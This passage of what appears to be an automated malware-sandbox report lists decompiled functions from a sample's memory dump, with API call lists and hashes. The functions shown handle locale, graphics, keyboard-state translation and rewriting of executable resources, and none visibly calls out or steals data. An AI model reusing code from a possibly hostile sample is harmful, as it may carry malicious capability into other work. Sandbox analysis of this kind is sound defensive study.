                                                    0x004108a4
                                                    0x004108af
                                                    0x004108b0
                                                    0x004108ba
                                                    0x004108bb
                                                    0x004108c0
                                                    0x004108db
                                                    0x004108dd
                                                    0x004108de
                                                    0x004108e1
                                                    0x004108e1
                                                    0x00410882
                                                    0x004108ea
                                                    0x004108ed
                                                    0x004108ef
                                                    0x004108f0
                                                    0x004108f6
                                                    0x004108fc
                                                    0x004108fe
                                                    0x00410900
                                                    0x00410903
                                                    0x00410906
                                                    0x00410906
                                                    0x00410909
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00410909
                                                    0x00410909
                                                    0x00410910
                                                    0x0041091b
                                                    0x00410923
                                                    0x0041092a
                                                    0x00410931
                                                    0x00410932
                                                    0x00410937
                                                    0x00410942
                                                    0x00410942
                                                    0x00410950
                                                    0x00410954
                                                    0x0041095a
                                                    0x0041095b
                                                    0x0041096b

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                    • VariantClear.OLEAUT32(?), ref: 0041095B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                    • String ID:
                                                    • API String ID: 920484758-0
                                                    • Opcode ID: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                    • Opcode Fuzzy Hash: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00477370 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				long _v20;
				void* _v24;
				struct HINSTANCE__* _t47;
				int _t53;
				char _t56;
				void* _t61;
				struct HINSTANCE__* _t64;
				intOrPtr _t69;
				intOrPtr _t75;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffec;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t81);
				_push(0x477494);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
				_v13 = _t61 != 0;
				if(_v13 == 0) {
					_pop(_t69);
					 *[fs:eax] = _t69;
					_push(0x47749b);
					return E004049E4( &_v12, 2);
				} else {
					 *[fs:eax] = _t83;
					_t64 =  *0x49ec78; // 0x0
					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
					 *((intOrPtr*)( *_t79 + 0xc))();
					L00403BEC(_t79);
					_t47 =  *0x49ec78; // 0x0
					FreeLibrary(_t47);
					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
					asm("sbb eax, eax");
					_v13 = _t53 + 1;
					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
						_t56 = 0;
					} else {
						_t56 = 1;
					}
					_v13 = _t56;
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(0x477479);
					return E0040277C(_v24);
				}
			}



















                                                    0x00477371
                                                    0x00477373
                                                    0x00477379
                                                    0x0047737c
                                                    0x00477382
                                                    0x0047738a
                                                    0x00477391
                                                    0x00477392
                                                    0x00477397
                                                    0x0047739a
                                                    0x004773ad
                                                    0x004773b1
                                                    0x004773b9
                                                    0x0047747b
                                                    0x0047747e
                                                    0x00477481
                                                    0x00477493
                                                    0x004773bf
                                                    0x004773ca
                                                    0x004773d3
                                                    0x004773e5
                                                    0x004773ed
                                                    0x004773fb
                                                    0x00477408
                                                    0x0047740d
                                                    0x00477412
                                                    0x00477418
                                                    0x00477433
                                                    0x0047743b
                                                    0x0047743e
                                                    0x0047744b
                                                    0x00477453
                                                    0x00477457
                                                    0x00477457
                                                    0x00477457
                                                    0x00477459
                                                    0x0047745e
                                                    0x00477461
                                                    0x00477464
                                                    0x00477471
                                                    0x00477471

                                                    APIs
                                                    • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00000000,00000000,00477494), ref: 00477418
                                                    • UpdateResourceA.KERNEL32(00000000,0000000A,00000000,00000000,?,?), ref: 00477433
                                                    • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$BeginFreeLibrary
                                                    • String ID:
                                                    • API String ID: 2368538523-0
                                                    • Opcode ID: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                    • Opcode Fuzzy Hash: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CED0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				L00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t74 = 0x40d050;
				_t86 = 0x40d050;
				_t83 =  *0x408034; // 0x408080
				if(L00403D78(_t87, _t83) != 0) {
					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
					_t69 = L00409F88(_t74, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(L00405FDC(_t53),  *_t16,  &_v790, 0x100);
				L00403B3C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return L00409F88(_v8, _t86);
			}































                                                    0x0040ced0
                                                    0x0040cedc
                                                    0x0040cedf
                                                    0x0040cee1
                                                    0x0040ceed
                                                    0x0040cefc
                                                    0x0040cf26
                                                    0x0040cf2c
                                                    0x0040cf38
                                                    0x0040cf3d
                                                    0x0040cf43
                                                    0x0040cf43
                                                    0x0040cf61
                                                    0x0040cf66
                                                    0x0040cf6b
                                                    0x0040cf72
                                                    0x0040cf7f
                                                    0x0040cf89
                                                    0x0040cf8d
                                                    0x0040cf94
                                                    0x0040cf9d
                                                    0x0040cf9d
                                                    0x0040cf94
                                                    0x0040cfae
                                                    0x0040cfb3
                                                    0x0040cfb7
                                                    0x0040cfc2
                                                    0x0040cfcf
                                                    0x0040cfda
                                                    0x0040cfe0
                                                    0x0040cfed
                                                    0x0040cff3
                                                    0x0040cffd
                                                    0x0040d003
                                                    0x0040d00a
                                                    0x0040d010
                                                    0x0040d017
                                                    0x0040d01d
                                                    0x0040d039
                                                    0x0040d04c

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                    • Opcode Fuzzy Hash: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CECE Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_t105 = __fp0;
				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				L00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t75 = 0x40d050;
				_t89 = 0x40d050;
				_t85 =  *0x408034; // 0x408080
				if(L00403D78(_t92, _t85) != 0) {
					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
					_t69 = L00409F88(_t75, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(L00405FDC(_t53),  *_t16,  &_v790, 0x100);
				L00403B3C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return L00409F88(_v8, _t89);
			}































                                                    0x0040cece
                                                    0x0040cedc
                                                    0x0040cedf
                                                    0x0040cee1
                                                    0x0040ceed
                                                    0x0040cefc
                                                    0x0040cf26
                                                    0x0040cf2c
                                                    0x0040cf38
                                                    0x0040cf3d
                                                    0x0040cf43
                                                    0x0040cf43
                                                    0x0040cf61
                                                    0x0040cf66
                                                    0x0040cf6b
                                                    0x0040cf72
                                                    0x0040cf7f
                                                    0x0040cf89
                                                    0x0040cf8d
                                                    0x0040cf94
                                                    0x0040cf9d
                                                    0x0040cf9d
                                                    0x0040cf94
                                                    0x0040cfae
                                                    0x0040cfb3
                                                    0x0040cfb7
                                                    0x0040cfc2
                                                    0x0040cfcf
                                                    0x0040cfda
                                                    0x0040cfe0
                                                    0x0040cfed
                                                    0x0040cff3
                                                    0x0040cffd
                                                    0x0040d003
                                                    0x0040d00a
                                                    0x0040d010
                                                    0x0040d017
                                                    0x0040d01d
                                                    0x0040d039
                                                    0x0040d04c

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                    • Opcode Fuzzy Hash: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040E174 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040E174() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x49e744 = 0x409;
				 *0x49e748 = 9;
				 *0x49e74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x49e744 = _t14;
				}
				if(_t14 != 0) {
					 *0x49e748 = _t14 & 0x3ff;
					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x49b134, 0x40e2c8, 8 << 2);
				if( *0x49b0ec != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x49e750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040E0FC(__eflags, _t49);
					}
				} else {
					_t20 = E0040E15C();
					if(_t20 != 0) {
						 *0x49e751 = 0;
						 *0x49e750 = 0;
						return _t20;
					}
					E0040E0FC(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x49e750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x49e751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x49e744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x49e751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                    0x0040e180
                                                    0x0040e18a
                                                    0x0040e194
                                                    0x0040e19e
                                                    0x0040e1a5
                                                    0x0040e1a7
                                                    0x0040e1a7
                                                    0x0040e1af
                                                    0x0040e1bb
                                                    0x0040e1c7
                                                    0x0040e1c7
                                                    0x0040e1db
                                                    0x0040e1e4
                                                    0x0040e293
                                                    0x0040e298
                                                    0x0040e29d
                                                    0x0040e2a4
                                                    0x0040e2a9
                                                    0x0040e2ab
                                                    0x0040e2ae
                                                    0x0040e2b4
                                                    0x0040e2b6
                                                    0x00000000
                                                    0x0040e2be
                                                    0x0040e1ea
                                                    0x0040e1ea
                                                    0x0040e1f1
                                                    0x0040e1f3
                                                    0x0040e1fa
                                                    0x00000000
                                                    0x0040e1fa
                                                    0x0040e207
                                                    0x0040e217
                                                    0x0040e219
                                                    0x0040e21e
                                                    0x0040e221
                                                    0x0040e227
                                                    0x0040e229
                                                    0x0040e22b
                                                    0x00000000
                                                    0x0040e22b
                                                    0x0040e237
                                                    0x0040e23c
                                                    0x0040e242
                                                    0x0040e242
                                                    0x0040e244
                                                    0x0040e245
                                                    0x0040e246
                                                    0x0040e246
                                                    0x0040e262
                                                    0x0040e268
                                                    0x0040e26d
                                                    0x0040e272
                                                    0x0040e278
                                                    0x0040e278
                                                    0x0040e27c
                                                    0x0040e27f
                                                    0x0040e285
                                                    0x0040e287
                                                    0x00000000
                                                    0x00000000
                                                    0x0040e289
                                                    0x0040e28c
                                                    0x0040e28c
                                                    0x0040e28d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040e28d
                                                    0x0040e278
                                                    0x0040e2c5
                                                    0x0040e2c5
                                                    0x00000000

                                                    APIs
                                                    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                    • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                      • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocaleStringThreadType
                                                    • String ID:
                                                    • API String ID: 1505017576-0
                                                    • Opcode ID: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                    • Opcode Fuzzy Hash: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00428D80 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00428D80(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					L004259F4(_v8);
					_push(_t87);
					_push(0x428e5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E0042A288( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					L00425CE8(_v8, _t69);
					_t59 =  *0x49b8ac; // 0x3030acc
					E0041AFE4(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x428e66);
					return L00425B60(_v8);
				}
			}

















                                                    0x00428d81
                                                    0x00428d83
                                                    0x00428d86
                                                    0x00428d89
                                                    0x00428d90
                                                    0x00428e6a
                                                    0x00428d96
                                                    0x00428d99
                                                    0x00428da0
                                                    0x00428da1
                                                    0x00428da6
                                                    0x00428da9
                                                    0x00428db2
                                                    0x00428dc3
                                                    0x00428dce
                                                    0x00428dda
                                                    0x00428de5
                                                    0x00428dea
                                                    0x00428e00
                                                    0x00428dec
                                                    0x00428df6
                                                    0x00428df6
                                                    0x00428e0c
                                                    0x00428e11
                                                    0x00428e2f
                                                    0x00428e13
                                                    0x00428e1f
                                                    0x00428e23
                                                    0x00428e23
                                                    0x00428e37
                                                    0x00428e3f
                                                    0x00428e44
                                                    0x00428e4b
                                                    0x00428e4e
                                                    0x00428e51
                                                    0x00428e5e
                                                    0x00428e5e

                                                    APIs
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                      • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                      • Part of subcall function 0042A288: GetDC.USER32(00000000), ref: 0042A2DE
                                                      • Part of subcall function 0042A288: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A2F3
                                                      • Part of subcall function 0042A288: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042A2FD
                                                      • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                      • Part of subcall function 0042A288: ReleaseDC.USER32 ref: 0042A32C
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00428DD5
                                                    • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                    • SelectPalette.GDI32(00000000,?,000000FF), ref: 00428E17
                                                    • RealizePalette.GDI32(00000000), ref: 00428E23
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                    • String ID:
                                                    • API String ID: 979337279-0
                                                    • Opcode ID: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                    • Opcode Fuzzy Hash: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047689C Relevance: 6.1, APIs: 4, Instructions: 81keyboardCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				short _v6;
				char _v262;
				int _v268;
				char _v272;
				struct HKL__* _t25;
				struct HKL__* _t28;
				int _t30;
				void* _t45;
				unsigned int _t52;
				intOrPtr _t56;
				int _t65;
				void* _t68;

				_v272 = 0;
				_v268 = 0;
				_t45 = __edx;
				_push(_t68);
				_push(0x47699d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffef4;
				 *0x49ec4c = GetKeyboardLayout(0);
				GetKeyboardState( &_v262);
				_t25 =  *0x49ec4c; // 0x0
				_t28 =  *0x49ec4c; // 0x0
				_t65 =  *(_t45 + 4);
				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
				_t52 =  *(_t45 + 8);
				if((_t52 & 0x80000000) != 0) {
					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
						E00404BA8();
						E00476A9C(_t45, _v272,  *(_t45 + 4));
					}
				} else {
					if(_t30 <= 0) {
						 *0x49ec50 =  *(_t45 + 4);
					} else {
						E00404BA8();
						E00476A9C(_t45, _v268,  *(_t45 + 4));
						 *0x49ec50 = 0;
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x4769a4);
				return E004049E4( &_v272, 2);
			}















                                                    0x004768aa
                                                    0x004768b0
                                                    0x004768b6
                                                    0x004768bc
                                                    0x004768bd
                                                    0x004768c2
                                                    0x004768c5
                                                    0x004768cf
                                                    0x004768db
                                                    0x004768e0
                                                    0x004768f3
                                                    0x004768fb
                                                    0x00476906
                                                    0x0047690b
                                                    0x00476914
                                                    0x00476952
                                                    0x0047696a
                                                    0x0047697a
                                                    0x0047697a
                                                    0x00476916
                                                    0x00476918
                                                    0x00476944
                                                    0x0047691a
                                                    0x00476923
                                                    0x00476933
                                                    0x0047693a
                                                    0x0047693a
                                                    0x00476918
                                                    0x00476981
                                                    0x00476984
                                                    0x00476987
                                                    0x0047699c

                                                    APIs
                                                    • GetKeyboardLayout.USER32 ref: 004768CA
                                                    • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                    • MapVirtualKeyExA.USER32(?,00000002,00000000), ref: 004768FF
                                                    • ToAsciiEx.USER32(?,00000000,?,?,00000000,00000000), ref: 00476906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Keyboard$AsciiLayoutStateVirtual
                                                    • String ID:
                                                    • API String ID: 692081290-0
                                                    • Opcode ID: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                    • Opcode Fuzzy Hash: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044E7A8 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
